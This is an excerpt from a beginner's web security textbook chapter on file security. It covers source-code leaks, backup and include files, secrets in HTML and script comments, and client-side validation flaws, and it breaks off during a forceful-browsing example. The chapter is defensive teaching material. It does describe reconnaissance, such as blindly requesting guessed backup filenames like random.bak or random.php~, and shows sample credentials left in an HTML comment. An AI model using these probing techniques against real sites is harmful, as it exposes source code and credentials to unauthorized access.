Book Excerpt: Web Application Security, A Beginner's Guide [Updated 2019]
Web Application Security: A Beginner’s Guide provides IT professionals with an actionable, rock-solid foundation in Web application security--from a complete overview of the tools and resources essential to Web application security to the trade's best practices for detecting vulnerabilities and protecting applications. Designed specifically for the needs of IT professionals looking to boost their skills in the ever-changing world of computer security, the book is divided into three sections. The first presents a primer on web application and software security concepts in general. The chapter offered here, “File Security Principles,” concludes the second section, which deals with principles of securing common areas of functionality of web applications. Finally, the third section shows the most effective ways to put all the concepts learned into action by laying out some secure development and deployment methodologies.
CHAPTER 8: File Security Principles
We'll Cover
• Keeping your source code secret
• Security through obscurity
• Forceful browsing
• Directory traversal
Even as widely used as relational SQL databases are, applications still store an enormous amount of data in plain old files, and this information can be just as critical or more so. Application configuration settings are stored in files. If an attacker could find a way to read these files—or even worse, write to them—then the whole security of the application could be put in jeopardy. We spent a lot of time and attention in the previous chapter talking about how important it is to secure your databases, and showing how to do this properly. But if you dig just a little deeper, you'll find that all the data in the database is stored in files. If you don't protect the files, you can't protect your database.
What other kinds of critical data are stored in files on your web servers? For one, the executable code for your web applications is stored there, either as source code or in compiled binary form, depending on the framework and language you're using. You definitely won't want attackers getting hold of that. And for that matter, the actual executable files that make up your operating system are stored on the server. So without good file system security, all the other defenses that you'll implement are basically moot.
Keeping Your Source Code Secret
In the battle between web application developers and attackers, the attackers unfortunately have the upper hand in many ways. Developers have limited (and usually extremely tight) schedules; attackers have as much time as they want. Worse, developers have to make sure every possible avenue of attack has been closed off, while attackers only have to find one flaw to succeed. But web developers do have one great advantage over attackers: attackers don't have access to the application's source.
To users and attackers alike, a web application is an opaque black box. They can give input to the black box and get output in return, but they really don't have any way to see what's going on in the middle.
Note
An extremely important caveat to this statement is that any code that executes on the client tier of the web application, such as JavaScript or Flash content that runs in the user's browser, is completely visible to attackers. We'll cover this topic in more detail later in this chapter, but always remember that only server-side code can be secured from prying eyes.
Keeping potential attackers away from the application source and/or executable files is hugely helpful to defense. Consider what happens with box-product applications that get installed on the user's machine. As soon as they're released, attackers tear through them with binary static analysis tools, looking for flaws. There's nowhere to hide. Plus, the attackers can perform all of their poking and probing on their own local machine. They can completely disconnect from the Internet if they want. There's no way for the developers to know that their application is under attack.
Again, the situation is completely different for web applications, as illustrated in Figure 8-1. Any code running on the web server should be shielded from potential attackers. They can't break it down with static analyzers. And any attacking they do has to come through the network, where you'll have the chance to detect it and block it. But this great advantage that you have is dependent on your keeping the code secret. If it gets out into the hands of attackers, your advantage is lost: they'll be able to analyze it disconnected from the network, just as if it were a box-product application.
Figure 8-1 An attacker can statically analyze desktop applications, but web applications are like black boxes.
IMHO
Those of you who are enthusiastic open-source supporters may be bristling at some of the statements we've just made. We want to clarify that we're not knocking open-source code. We love open software, we use it all the time, and we've contributed some ourselves. But whether or not you release your code should be your choice to make. If you choose to make your app open, that's great, but don't let an attacker steal your code if you want to keep it to yourself.
However, there is one aspect to open-source software that we don't particularly like. We personally find the "given enough eyeballs, all bugs are shallow" mantra to be pretty weak, especially when it comes to security bugs. By relying on other people to find security issues in your code, you're making two very big assumptions: one, that they know what kinds of issues to look for; and two, that they'll report anything they find responsibly and not just exploit it for themselves.
Static Content and Dynamic Content
Before we go any further on the topic of source code security, it's important that we talk about the distinction between static content and dynamic content. When a user requests a resource from your web server, such as an HTML page or JPEG image, the server either sends him that resource as-is, or it processes the resource through another executable and then sends him the output from that operation. When the server just sends the file as-is, this is called static content, and when it processes the file, that's dynamic content. The web server decides whether a given resource is static or dynamic based on its file type, such as "HTML" or "JPG" or "ASPX."
For example, let's say my photographer friend Dave puts up a gallery of his photographs at www.photos.cxx/gallery.html. This page is simple, static HTML, and whenever you visit this page, the photos.cxx web server will just send you the complete contents of the gallery.html file:
[sourcecode]
<html>
<body>
<h1>Welcome to Dave's photo gallery</h1>
<img src="images/whistler_vacation.jpg" />
<img src="images/eagle_on_bike_trail.jpg" />
<img src="images/kitty_napping.jpg" />
...
</body>
</html>
[/sourcecode]
All the JPEG image files referenced on this page are also static content: When you view the gallery.html web page, your browser automatically sends requests for the images named in the <img> tags, and the web server simply sends the contents of those image files back to you.
Now let's contrast that with some dynamic content files. Let's say Dave adds a page to the photo gallery that randomly chooses and displays one picture from the archive. He writes this page in PHP and names it www.photos.cxx/random.php.
[sourcecode]
<html>
<body>
<h1>Random photo from Dave's photo gallery</h1>
<?php
// Collect every JPEG in the images directory, then pick one at random.
$allImages = glob("images/*.jpg");
$randomImage = $allImages[array_rand($allImages, 1)];
echo "<img src=\"" . $randomImage . "\" />";
?>
</body>
</html>
[/sourcecode]
Note
The PHP function "glob" referred to in this code snippet is one of the worst-named functions ever, and if you're not already a seasoned PHP developer, you probably won't have any idea what it really does. Although it sounds as if it should declare or set a global variable or something along those lines, glob is actually a file system function that searches for files and directories matching the specified pattern, and returns all of the matches in an array. For example, in the previous code snippet, we searched for the pattern "images/*.jpg," and glob returned a list of all JPEG filenames in the "images" directory. It's pretty simple, but just not intuitively named!
When Dave first installed the PHP interpreter on his web server, he configured the server to treat PHP files as dynamic content and not static content. Now when you make a request for www.photos.cxx/random.php, the server doesn't just send you back the raw source contents of the random.php file; instead, it sends the file to the PHP interpreter executable on the server, and then returns the output of that executable to you, as illustrated in Figure 8-2.
Figure 8-2 The photos.cxx server is configured to process PHP pages as dynamic content.
Note
Just because a page is static content doesn't mean that there's nothing to do on that page. Static HTML files can have text box inputs, drop-down boxes, buttons, radio buttons, and all sorts of other controls. And on the other hand, just because a page is dynamic content doesn't mean that there is anything to do there. I could write a dynamic Perl script just to write out "Hello World" every time someone goes to that page.
The line between static and dynamic gets even blurrier when you look at pages that make extensive use of client-side script, like Ajax or Flash applications. We'll cover some of the many security implications of these applications later in this chapter, but for right now we'll focus on the fact that for static content, the source is delivered to the user's browser, but dynamic content is processed on the server first.
Revealing Source Code
You can see how important it is to configure the server correctly. If Dave had made a mistake when setting up the server, or if he accidentally changes the file-handling configuration at some time in the future, then when you request www.photos.cxx/random.php, you could end up getting the source code for the random.php file, as shown in Figure 8-3.
Figure 8-3 The photos.cxx server is misconfigured to serve PHP files as static content, revealing the application's source code.
In this particular case that may not be such a big deal. But what if he had put some more sensitive code into that page? What if he had programmed it so that on his wife's birthday, the page displays the message "Happy Birthday!" and always shows an image of a birthday cake instead of a random picture? If the source code for that leaked out, then his wife might find out ahead of time and the surprise would be ruined.
Of course, there are other much more serious concerns around source code leakage than just spoiled birthday surprises. Many organizations consider their source to be important intellectual property. Google tightly guards the algorithms that it uses to rank search results. If these were to leak out as the result of a misconfigured server, Google's revenue and stock price could decline.
It's bad enough if your source code leaks out and reveals your proprietary algorithms or other business secrets. But it's even worse if that source code contains information that could help attackers compromise other portions of your application.
One extremely bad habit that developers sometimes fall into is to hard-code application credentials into the application's source code. We saw in Chapter 7 that an application usually connects to its database using a database "application user" identity and not by impersonating the actual end users themselves. Out of convenience, application programmers will sometimes just write the database connection string—including the database application user's username and password—directly into the application source code. If your application is written this way and the page source code accidentally leaks out, now it's not just your business logic algorithms that will end up in the hands of attackers, but your database credentials too.
Another example of this same problem happens when developers write cryptographic secrets into their source code. Maybe you use a symmetric encryption algorithm (also called a secret-key algorithm) such as the Advanced Encryption Standard (AES) to encrypt sensitive information stored in users' cookies. Or maybe you use an asymmetric encryption algorithm (also called a public-key algorithm) such as RSA to sign cookie values so you know that no one, including potentially the user himself, has tampered with the values. In either of these cases, the cryptographic keys that you use to perform the encryption or signing must be kept secret. If they get out, all the security that you had hoped to add through the use of cryptography in the first place will be undone.
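One way to avoid both of these habits is to keep credentials and keys out of the source files altogether and read them from the server's environment when the application starts. Here's a minimal Python sketch of that idea. The variable names (PHOTOS_DB_USER, PHOTOS_DB_PASSWORD) and the helper functions are hypothetical, invented for this illustration; a dedicated secrets manager or a protected configuration file stored outside the web root would serve the same purpose.

```python
import os


class MissingSecretError(RuntimeError):
    """Raised when a required secret has not been provided to the process."""


def load_secret(name, environ=None):
    """Fetch a secret by name from the environment instead of from source code."""
    source = os.environ if environ is None else environ
    value = source.get(name, "")
    if not value:
        # Fail loudly at startup rather than falling back to a hard-coded default.
        raise MissingSecretError("required secret %s is not set" % name)
    return value


def database_settings(environ=None):
    """Assemble the application user's database credentials at run time."""
    return {
        "user": load_secret("PHOTOS_DB_USER", environ),          # hypothetical name
        "password": load_secret("PHOTOS_DB_PASSWORD", environ),  # hypothetical name
    }
```

With this arrangement, a leaked page reveals only the names of the settings, not their values. The same approach applies to the cryptographic keys discussed above.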
Interpreted versus Compiled Code
The photo gallery application we've been using as an example is written in PHP, which is an interpreted language. With interpreted-language web applications, you deploy the source code files directly to the web server. Then, as we saw before, when a user requests the file, the interpreter executable or handler module for that particular file format parses the page's source code directly to "run" that page and create a response for the user. Some popular interpreted languages for web applications include:
• PHP
• Perl
• Ruby
• ASP (that is, "classic" VBScript ASP, not ASP.NET)
However, not every language works this way; some languages are compiled and not interpreted. In this case, instead of directly deploying the source code files to the web server, you first compile them into executable libraries or archives, and then you deploy those libraries to the server. For example, let's say you wanted to write an ISAPI (Internet Server Application Programming Interface) extension handler for IIS using C++. You'd write your C++ code, compile the C++ to a Win32 dynamic-link library (DLL), and then copy that DLL to the web server.
Note
There is a third category of languages that combines elements of both interpreted and compiled languages. Languages like Java, Python, and the ASP.NET languages (C#, VB.NET, and so on) are compiled, but not directly into executable images. Instead, they're compiled into an intermediate, bytecode language. This bytecode is then itself either interpreted or recompiled into an actual executable.
This may seem like a roundabout method of writing applications, but it actually combines the best aspects of both compiled and interpreted languages: you get the performance of compiled code (or close to it) and the machine-independence of interpreted code.
Where this matters from a security perspective is that you shouldn't think you're any more secure against source code leakage just because you're using a compiled language instead of an interpreted one. If an attacker gains access to your Java WAR (Web ARchive) file or your ASP.NET assembly DLL, he may not be able just to open it in a text editor, but there are freely available decompiler tools that can actually turn these files back into source code. (You can see a screenshot of one of these tools, Java Decompiler, in Figure 8-4.) And as we saw at the beginning of the chapter, any type of executable can be scanned for vulnerabilities with static binary analysis tools.
Figure 8-4 The Java Decompiler tool reconstructs Java source code from a compiled JAR file.
Backup File Leaks
It's very important to remember that the way a web server handles a request for a file (that is, whether it treats the file as dynamic content and processes it, or treats it as static content and simply sends it along) depends on the file's extension and not on its contents. Let's say that I took the random.php file from the example photo gallery application and renamed it to random.txt. If someone were to request the web page www.photos.cxx/random.txt now, the web server would happily send them the static source code of that file. Even though the contents of random.txt would still be the same completely legal and well-formed PHP code they always were, the server doesn't know or care about that. It doesn't open up the file to try to determine how to handle it. It just knows that it's configured to serve .txt files as static content, so that's what it does.
It's also important to remember that by default, most web servers will serve any unknown file type as static content. If Dave renames his random.php page to random.abcxyz and doesn't set up any kind of special handler rule on his server for ".abcxyz" files, then a request for www.photos.cxx/random.abcxyz would be fulfilled with the static contents of the file.
Note
As of this writing, two of the three most popular web servers, Apache (with a reported 60 percent market share) and nginx (with an 8 percent share), serve files with unrecognized extensions as static content unless specifically configured not to. However, Microsoft Internet Information Services (or IIS, with a 19 percent share) version 6 and later will not serve any file with a file type that it hasn't been explicitly configured to serve. IIS's behavior in this regard is much more secure than Apache's or nginx's, and the other web servers would do well to follow IIS's lead here.
Problems of this type, where dynamic-content files are renamed with static-content extensions, happen more often than you'd think. The main culprit behind this is "ad-hoc source control," or in other words, developers making backup files in a production directory. Here are three examples of how this might happen:
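The extension-based decision described above can be sketched in a few lines of Python. This is an illustration of the idea only, not how Apache, nginx, or IIS is actually implemented; the handler table, the list of static types, and the function name are all assumptions made for the example.

```python
import os

# Hypothetical configuration for the photos.cxx example.
DYNAMIC_HANDLERS = {".php": "php-interpreter"}
STATIC_TYPES = {".html", ".jpg", ".txt"}


def classify_request(path, serve_unknown_as_static=True):
    """Decide how to answer a request using only the file extension."""
    extension = os.path.splitext(path)[1].lower()
    if extension in DYNAMIC_HANDLERS:
        return "dynamic"   # run the file through its handler, send the output
    if extension in STATIC_TYPES:
        return "static"    # send the file contents as-is
    # Unknown extension: a permissive server sends the raw file anyway,
    # while a deny-by-default server refuses the request.
    return "static" if serve_unknown_as_static else "refused"
```

Notice that the function never opens the file. Under the permissive default, classify_request("random.abcxyz") comes back as "static" even though the file holds PHP source; passing serve_unknown_as_static=False models the deny-by-default behavior instead.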
Scenario 1. The current version of random.php is programmed to find only random JPEG files in the image gallery. But Dave has noticed that there are some GIF and PNG files in there too, and right now those will never get chosen as one of the random photos. He wants to edit the code so that it looks for random GIF and PNG files too, but he's not 100 percent sure of the PHP syntax he needs to do that. So, the first thing he does is to make a copy of random.php called random.bak. This way, if he messes up the code trying to make the change, he'll still have a copy of the original handy and he can just put it back the way it was to begin with. Now he opens up random.php and edits it. He manages to get the syntax right on the first try, so he closes down his development environment and heads off to get some sleep. Everything looks great, except that he's forgotten about his backup file random.bak still sitting there on the web server.
Scenario 2. Just as in the first scenario, Dave wants to make a change to random.php, and he's not positive about the syntax to make the change correctly. He also knows how dangerous it is to edit files directly on the production server—if he did make a mistake, then everyone who tries to visit the site would just get an error until he fixes it. So he syncs his development machine to the current version of the production site, makes a random.bak backup copy of random.php on his local dev box, and then makes the changes to random.php there. He also has a few other features that he'd like to add to some of the other pages in the application, so he takes this opportunity to make those changes too. Once he's verified that all his changes work, he's ready to push the new files to production. So far, so good, except that when Dave goes to deploy his changes, instead of just copying and pasting the specific files that he edited, he copies and pastes the entire contents of his development folder, including the random.bak file.
Scenario 3. This time, Dave opens up the source code to make a simple change he's made dozens of times before. He knows exactly what syntax to use, and he knows he's not going to make any mistakes, so he doesn't save a backup file. If Dave doesn't save a backup file, there's no chance of accidental source code disclosure, right? Unfortunately, that's not the case. While Dave may not have explicitly saved a backup file, his integrated development environment (IDE) source code editor does make temporary files while the user is editing the originals. So the moment that Dave fired up the editor and opened random.php, the editor saved a local copy of random.php as random.php~. Normally the editor would delete this temporary file once Dave finishes editing the original and closes it, but if the editor program happens to crash or otherwise close unexpectedly, it may not get the chance to delete its temporary files and the source code would be visible. Even if that doesn't happen, if Dave is making changes on a live server, then the temporary file will be available for the entire time that Dave has the original open. If he leaves his editor open while he goes to lunch, or goes home for the night, that could be a pretty large window of attack.
In all of these cases, the backup files wouldn't be "advertised" to potential attackers. There wouldn't be any links to these pages that someone could follow. But these mistakes are common enough to make it worth an attacker's time to go looking for them. If an attacker sees that a web application has a page called random.php, he might make blind requests for files like:
• random.bak
• random.back
• random.backup
• random.old
• random.orig
• random.original
• random.php~
• random.1
• random.2
• random.xxx
• random.php.bak
• random.php.old
And so on, and so on. The more obvious the extension, the sooner he's likely to guess it; so he'd find random.php.1 before he'd find random.xyzabc. But the solution here is not to pick obscure extensions: the solution is to not store backups in production web folders.
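You can turn the attacker's guessing game into a pre-deployment check of your own. The following Python sketch walks a web folder and flags filenames that look like the backup and temporary files listed above. The suffix list is only a starting point taken from that list, and the function names are hypothetical; extend the patterns to match whatever your own editors and habits produce.

```python
import os
import re

# Suffixes taken from the guesses listed above, plus the editor's "~" temp files.
BACKUP_SUFFIXES = (".bak", ".back", ".backup", ".old", ".orig", ".original", "~")
NUMERIC_EXTENSION = re.compile(r"\.\d+$")  # random.1, random.php.2, and so on


def looks_like_backup(filename):
    """Return True if the filename matches a common backup naming pattern."""
    lowered = filename.lower()
    return lowered.endswith(BACKUP_SUFFIXES) or bool(NUMERIC_EXTENSION.search(lowered))


def find_backup_files(web_root):
    """List every file under web_root that looks like a leftover backup."""
    matches = []
    for directory, _subdirs, filenames in os.walk(web_root):
        for name in filenames:
            if looks_like_backup(name):
                matches.append(os.path.join(directory, name))
    return sorted(matches)
```

Running find_backup_files against the folder you're about to deploy, and refusing to deploy if it returns anything, would have caught the stray file in all three of Dave's scenarios, provided the check is run against the live folder as well.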
Include-File Leaks
While there's never a good reason to keep backup files on your live web server—at least, there's never a good enough reason to outweigh the danger involved—there's another situation that's a little more of a security gray area.
It's pretty common for multiple pages in a web application to share at least some of their functionality. For example, each page in Dave's photo gallery app might have a section where viewers can rate photos or leave comments on what they like and don't like. It would be a little silly for him to re-implement this functionality from scratch for each different file. Even cutting and pasting code from one file to the next means that every time he makes a change in one place, he'll need to remember to go make that exact same change in every other place. This is fragile and inefficient.
Instead of copying the same bit of code over and over in multiple places, it's better just to write it once into a single module. Every page that needs that particular functionality can then just reference that module. For compiled web applications, that module might be a library the application can link with, but for interpreted applications, it will just be another file full of source code. Now you have a new problem: what file extension should you give these included file modules?
In some programming languages, you don't have any real choice as to the file extension of your include modules. Python modules, for example, must be named with a .py file extension. But in others, such as PHP, you can choose any extension you want. Some developers like to name include modules with an extension like .inc or .include because it helps them keep straight which files are meant to be publicly accessible and which are meant to be include-only. The problem with this approach is that, unless configured otherwise, the web server will serve these files as static content to anyone who asks for them.
Into Action
The safest way to name your include files is to give them the same extension as normal pages: .php, .rb, and so on. But if you really want to name them with .inc extensions and you won't take this advice, then be absolutely sure to configure your web server to block requests for those extensions.
Keep Secrets Out of Static Files
So far, we've talked a lot about the importance of keeping the source code for your dynamic content pages out of the hands of potential attackers. There is an equally important flip side to this coin, however: You need to make sure that you never put sensitive information into static content pages.
The most common way you'll see this mistake is when developers write information into comments in HTML or script files. Since 99 percent of legitimate users (and QA testers) never view the page source, it can be easy to forget that comment text is only a "View Source" click away. It's unfortunately all too common to see HTML like this:
[sourcecode]
. . .
<form>
Username: <input type="text" id="username" /><br/>
Password: <input type="password" id="password" /><br/>
<!-- Note to dev team: use username=dev, pwd=c0nt4d0r -->
</form>
[/sourcecode]
Doing this is like hiding your front door key under the welcome mat: It's the first place an attacker will look. But realistically, it's doubtful that anyone does this knowingly; they either forget that HTML comments are visible in the page source, or they mix up client-side and server-side comments. Consider the following two snippets of mixed PHP/HTML code. Here's the first snippet:
[sourcecode]
. . .
Item name: <?php echo($catalog_item->name); ?> <br/>
Item price: <?php echo($catalog_item->fullPrice); ?> <br/>
<?php
// Note: change to $catalog_item->salePrice on 6/17
?>
[/sourcecode]
Now compare that with this snippet:
[sourcecode]
. . .
Item name: <?php echo($catalog_item->name); ?> <br/>
Item price: <?php echo($catalog_item->fullPrice); ?> <br/>
<!--
Note: change to $catalog_item->salePrice on 6/17
-->
[/sourcecode]
These two pieces of code are almost completely identical, and if you looked at each of the resulting pages in browser windows, you wouldn't see any difference at all. But the first snippet used PHP comment syntax to document the upcoming sale price of the store item, and the second snippet used HTML comment syntax. The interpreter won't render PHP comments (or the comments of any other dynamic language like Java or C#) in the page output; it'll just skip over them. But the HTML comments do get written to the page output. That one little change from "//" to "<!--" is all it took to reveal that a big sale is coming up and maybe convince some people to hold off on their purchases.
Besides HTML, you'll also see sensitive information in JavaScript comments. Even though you can make highly interactive sites with JavaScript—Google's Gmail, Docs, and Maps (shown in Figure 8-5) applications come to mind as great examples of JavaScript UI—it's still just a "static" language in that JavaScript files get served to the browser as source code. Any comments you write in JavaScript code will be visible to users.
Figure 8-5 Google Maps uses client-side JavaScript extensively in order to provide a responsive user interface.
Documentation
Another way you'll often see this kind of problem is in overly helpful documentation comments. (This comes up more often in JavaScript, but sometimes in HTML too.) Most developers learn early on in their careers that it's important for them to properly document their code. It can be a nightmare trying to work on someone else's undocumented code, usually years after that person has left the organization, and you have no idea what they were thinking when they wrote it.
So documentation does have an important place in development, but that place is on the server, not the client. See how much information you can pull out of this seemingly innocent code comment:
[sourcecode]
<html>
<script>
// Changed by Kyle 7/1/2011: Fixed IE9 rendering bug
// Changed by Kate 6/28/2011: Fixed XHR timeout bug for IE, still TODO for FF
// Changed by John 6/27/2011: Improved perf by 23%, compare versus old version at dev02.site.cxx/page.php
// Created by Beth 1/4/2004
function foo( ) {
. . .
}
[/sourcecode]
There are a few readily apparent pieces of sensitive information being shared here. First, we can see that while there was a timeout bug in the code that was recently fixed for Internet Explorer, the bug is still present for Firefox. It's possible that there's a way an attacker could take advantage of that, maybe by intentionally creating a race condition.
Second, we can see that an old version of the page is stored at dev02.site.cxx/page.php. We may not have even been aware that there was such a domain as dev02.site.cxx before; here's a whole new site to explore and attack. And we know this site has old code, so there may be security vulnerabilities that are fixed on the main site that are still present on this dev site. And if there's a dev02.site.cxx, is there also a dev01.site.cxx, or a dev03.site.cxx?
There are a couple of other more subtle pieces of information an attacker can get from the comments that might lead him to take a closer look. First of all, the code is very old (by Internet standards, at least): it was originally written in January 2004. While it's not a hard rule, in general older code will often have more vulnerabilities than newer code. New vulnerabilities are discovered all the time, and it's less likely that code dating back to 2004 would be as secure against a vulnerability published in 2008 as newer code would be.
Into Action
To ensure that you're not accidentally revealing sensitive information in HTML or script comments, check for these as part of your quality assurance acceptance testing. You should open each page and script file in a browser, view its source, and scan through the files looking for comment syntax such as "//" or "/*" or "<!--". If you're using an automated testing framework, you can configure it to flag comment text for later review by a human tester to determine whether the comment should be considered sensitive and removed.
Use your judgment as to whether a particular comment is sensitive or not. Test credentials definitely are sensitive, and bug comments or "to-do's" usually shouldn't be publicly visible either. Remember that even simple documentation of the method—when it was written, who last modified it, what it's supposed to do—may unnecessarily reveal information to an attacker.
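If you'd like to automate the first pass of that review, here's a rough Python sketch that pulls the comments out of a page's rendered source so a human can judge them. It uses the standard library's html.parser module; the class and function names are our own invention, and the script-comment pattern is deliberately naive, so treat its output as a list of candidates and not as a verdict.

```python
import re
from html.parser import HTMLParser

# Naive pattern for /* block */ and // line comments inside script text.
JS_COMMENT = re.compile(r"/\*.*?\*/|//[^\n]*", re.DOTALL)


class CommentCollector(HTMLParser):
    """Gather HTML comments and script comments from one page of output."""

    def __init__(self):
        super().__init__()
        self.comments = []
        self._in_script = False
        self._script_text = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._script_text = []

    def handle_data(self, data):
        if self._in_script:
            self._script_text.append(data)  # buffer until the script ends

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            for match in JS_COMMENT.finditer("".join(self._script_text)):
                self.comments.append(("script", match.group(0).strip()))

    def handle_comment(self, data):
        self.comments.append(("html", data.strip()))


def collect_comments(page_source):
    """Return (kind, text) pairs for every comment found in the page source."""
    collector = CommentCollector()
    collector.feed(page_source)
    collector.close()
    return collector.comments
```

Feed it the output your server actually sends, not the files on disk, because server-side comments never reach the browser. Expect some false positives: a string literal containing "//", such as a URL, will be flagged along with the real comments.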
Note
Another factor to consider is that today's threats are a lot more severe than they were in 2004. Code of that era wasn't built to withstand concerted attacks from LulzSec-type organizations or from foreign government agencies with dedicated "Black-Ops" hacking teams.
Another subtle vulnerability predictor is that the code has been under a lot of churn in a short amount of time. Seven years went by without a single change, and then it was modified three times by three different people in the space of one week. Again, this doesn't necessarily mean the code has vulnerabilities in it, but it's something that might catch an attacker's eye and lead him to probe more deeply.
Exposing Sensitive Functionality
The final thing we need to discuss before we move on to other file security issues is the importance of keeping sensitive functionality away from attackers. We're drifting a little away from the overall chapter topic of file security now, but since we're already on the subject of keeping other sensitive information such as source code and comments safely tucked away on the server, this will be a good time to cover this important topic.
Many modern web applications do almost as much processing on the client-side tier as they do on the server-side. Some do even more. For example, think about online word processing applications like Google Docs, Microsoft Office Live, or Adobe Acrobat.com. All of the document layout, formatting, and commenting logic of these applications is performed on the client tier, in the browser, using JavaScript or Flash. These kinds of client-heavy web apps are called Rich Internet Applications, or RIAs for short.
RIAs can have a lot of advantages over standard server-heavy web applications. They can offer a more interactive, more attractive, and more responsive user interface. Imagine trying to write a full-featured word processor, spreadsheet, or e-mail app without client-side script. It might not be technically impossible, but the average user would probably spend about 30 seconds using such a slow and clunky application before giving up and going back to his old box-product office software. It's even worse when you're trying to use server-heavy apps on a mobile device such as a smartphone or tablet that has a slower connection speed when it's outside WiFi range.
Another advantage of RIAs is that you can move some of the business logic of the application to the client tier to reduce the burden on the server. Why spend server time calculating spreadsheet formulas when you can have the user's browser do it faster and cheaper? However, not all business logic is appropriate for the client to handle. Computing spreadsheet column sums and spell-checking e-mail messages with client-side script is one thing; making security decisions is totally different.
For a real-world example of inappropriate client-side logic, let's look at the MacWorld Expo web site circa 2007. The year 2007 was huge for MacWorld Expo; this was the show where Steve Jobs first unveiled the iPhone in his keynote address. If you had wanted to see this event in person, you would have had to pony up almost $1,700 for a VIP "platinum pass"—but at least one person found a way to sneak in completely for free.
The MacWorld conference organizers wanted to make sure that members of the press and other VIPs got into the show for free, without having to pay the $1,700 registration fee. So, MacWorld e-mailed these people special codes that they could use when they went to register for their conference passes on the MacWorld Expo web site. These codes gave the VIPs a special 100 percent discount—a free pass.
In an attempt to either speed up response time or take some load off their server, the conference web site designers implemented the discount feature with client-side code instead of server-side code. All of the logic to test whether the user had entered a valid discount code was visible right in the browser for anyone who cared to look for it. It was a simple matter for attackers—including at least one security researcher who then reported the issue to the press—to open the client-side JavaScript and reveal the secret discount codes.
The takeaway here is that you should never trust the client to make security decisions for itself. If the MacWorld Expo web site designers had kept the discount code validation logic on the server side, everything would have been fine. But by moving this logic to the client, they opened themselves to attack. Authentication and authorization functionality (which is essentially what a discount code validation is) should always be performed on the server. Remember, you can't control what happens on the client side. If you leave it up to the user to decide whether they should get a free pass to see Steve Jobs' keynote or whether they should pay $1,700, chances are they're going to choose the free option whether that's what you wanted or not.
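To make the server-side approach concrete, here's a minimal sketch (in Python, purely for illustration) of how a discount check might live entirely on the server. Everything in it is an assumption: the function names, the example code "EXAMPLE-VIP-CODE," and the price are hypothetical, and a real application would load its codes from a protected data store rather than from source code. The point is only that the browser submits a code and the server alone decides what to charge.

```python
import hashlib
import hmac

# Assumed full price in cents (roughly the $1,700 from the example).
FULL_PRICE_CENTS = 170_000

# Hypothetical data: the server keeps only SHA-256 digests of valid codes,
# mapped to a percent discount. Nothing here is ever sent to the browser.
_VALID_CODE_DIGESTS = {
    hashlib.sha256(b"EXAMPLE-VIP-CODE").hexdigest(): 100,
}


def discount_percent(submitted_code: str) -> int:
    """Return the discount for a submitted code, or 0 if it is not valid."""
    digest = hashlib.sha256(submitted_code.strip().encode("utf-8")).hexdigest()
    for known_digest, percent in _VALID_CODE_DIGESTS.items():
        # compare_digest avoids leaking information through comparison timing.
        if hmac.compare_digest(digest, known_digest):
            return percent
    return 0


def price_to_charge(submitted_code: str) -> int:
    """Compute the final price on the server; the client never supplies it."""
    percent = discount_percent(submitted_code)
    return FULL_PRICE_CENTS * (100 - percent) // 100
```

Because the price is computed from server-side data, editing the page's JavaScript gains the attacker nothing: the only thing the client can influence is the code it submits.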
IMHO
Programmers often refer to making function calls as "issuing commands" to the system. This is a Web 1.0 mindset. You may be able to think of server-side code as "commands," but when it comes to client-side code, you can only offer "suggestions." Never forget that an attacker can alter your client-side logic in any way he wants, which means that all the really important decisions need to be made on the server, where you have a better chance of guaranteeing that they're made the way you want them to be made.
Your Plan
❏ Don't hard-code login information such as test account credentials or database connection strings into your application. Doing this not only makes the code harder to maintain, but it also presents a potential security risk if the application source code were to be accidentally revealed.
❏ Never make backup copies of web pages in production folders, even for a second. Also be sure not to deploy local backup copies to production: it's easy to forget this if your deployment procedure is just to copy all the files in your local development folder and paste them to the production machine.
❏ When possible, it's best to name any include files with the same extension as your main source files (for example, .php instead of .inc or .include).
❏ For dynamic content pages, write code comments using the comment syntax for the dynamic language and not in HTML. HTML comments will be sent to the client where attackers can read them.
❏ For static content pages, make sure that absolutely no sensitive information, including links to non-public files or directories, is written in the code comments. When possible, use your testing framework to flag all comments so that you or your quality assurance team can check them before you deploy.
❏ Always remember that code you write for the client tier is not a set of "commands," just a set of "suggestions." An attacker can change this code to anything he wants. If you make security decisions like authentication or authorization in client-side code, you may as well not make them at all.
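The comment check suggested in the plan above could be automated along these lines. This is a rough sketch in Python that uses the standard library's html.parser module to collect every HTML comment in a page that's about to be served. The class and function names are our own inventions, and you'd need to wire the check into whatever testing framework you actually use.

```python
from html.parser import HTMLParser


class CommentCollector(HTMLParser):
    """Collects the text of every HTML comment fed to the parser."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        # Called by HTMLParser with the text between "<!--" and "-->".
        self.comments.append(data.strip())


def find_html_comments(html_text: str) -> list:
    """Return all HTML comments found in html_text, in document order."""
    collector = CommentCollector()
    collector.feed(html_text)
    collector.close()
    return collector.comments
```

A test could fetch each rendered page, run it through find_html_comments, and fail (or at least warn) whenever the list comes back non-empty, so that a person reviews the comments before deployment.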
Security Through Obscurity
With all of this text on how to keep an application's source code and algorithms hidden so that attackers can't view them, it may sound as if I'm advocating security through obscurity, or a defense based solely on the ability to hide the inner workings of the system. This is most definitely not the case; security through obscurity is a poor defense strategy that's doomed to failure.
That being said, I want you to build your applications securely, but there's no need to advertise potential vulnerabilities. To put it another way: security through obscurity is insufficient; but security and obscurity can be a good thing. If you look closely at all of the security principles and defense strategies we've discussed (and will discuss) in this chapter, you'll see that they are about improving both aspects.
Security expert Jay Beale, currently Managing Partner, CFO, and Chairman of InGuardians Inc, explores this same topic (and comes to the same conclusion) in his paper "'Security Through Obscurity' Ain't What They Think It Is." Jay states that obscurity isn't always bad; it's just bad when it's your only defense. He goes on to give an example: Suppose you have a web application serving sensitive internal company data. If your entire defense of this application consists of hiding it by running it on a nonstandard port (maybe port 8000 instead of 80), then you're going to get hacked. Someone will run a port scanner against this server, find the application, and steal all your confidential data. But assuming you do take proper steps to secure the site, locking it down with strong authentication and SSL, then running it on a nonstandard port certainly wouldn't hurt anything and might raise the bar a little bit.
Forceful Browsing
We're about halfway through the chapter now, so I think it's a good time for a quick "midterm" test.
The infamous web hacker Miss Black Cat is visiting Dave's photo gallery site, looking around for some interesting vulnerabilities she can exploit. She starts at the page www.photos.cxx/welcome.php. When she views the HTML source of the page—as all good attackers always do—she sees the following code:
[sourcecode]
<html>
<body>
<h1>Welcome to Dave's Photo Gallery!</h1>
<a href="photos.php">View photos</a>
<a href="vote.php">Vote for your favorite picture</a>
